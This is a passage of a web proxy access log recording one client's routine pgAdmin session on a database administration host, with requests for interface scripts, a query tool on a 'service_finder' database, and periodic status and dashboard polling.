"/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/browser/check_corrupted_db_file" [Client 84.1.26.27] [Length 61] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/misc/bgprocess/" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/preferences/get_all" [Client 84.1.26.27] [Length 11809] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 422] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/browser/nodes/" [Client 84.1.26.27] [Length 273] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - POST https db.profibot.hu "/browser/master_password" [Client 84.1.26.27] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/settings/object_explorer_filter" [Client 84.1.26.27] [Length 95] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" [Client 84.1.26.27] [Length 2906] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:20 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3131] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tool_data/3857941" [Client 84.1.26.27] [Length 975] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 428 428 - POST https db.profibot.hu "/sqleditor/initialize/sqleditor/3857941/1/2/16384" [Client 84.1.26.27] [Length 285] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:21 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:21 +0000] - 200 200 - GET https db.profibot.hu "/misc/upgrade_check?trigger_update_check=false" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:22 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:28 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/connect_server/2" [Client 84.1.26.27] [Length 295] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:29 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/initialize/sqleditor/3857941/1/2/16384" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:29 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:29 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:31 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:35 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:35 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/children/1" [Client 84.1.26.27] [Length 390] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:35 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/connect/1/2" [Client 84.1.26.27] [Length 314] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/nodes/" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/children/1/2" [Client 84.1.26.27] [Length 232] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/role/nodes/1/2/" [Client 84.1.26.27] [Length 461] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/nodes/1/2/" [Client 84.1.26.27] [Length 315] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/database/children/1/2/16384" [Client 84.1.26.27] [Length 435] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/nodes/1/2/16384/" [Client 84.1.26.27] [Length 476] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/children/1/2/16384/2200" [Client 84.1.26.27] [Length 621] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:36 +0000] - 200 200 - GET https db.profibot.hu "/browser/schema/children/1/2/16384/17561" [Client 84.1.26.27] [Length 624] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:37 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:39 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:50 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_tree_state/" [Client 84.1.26.27] [Length 63] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:50 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 400] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:52 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:54 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 235] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:57 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:01:59 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:09:02:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:16 +0000] - 200 200 - GET https db.profibot.hu 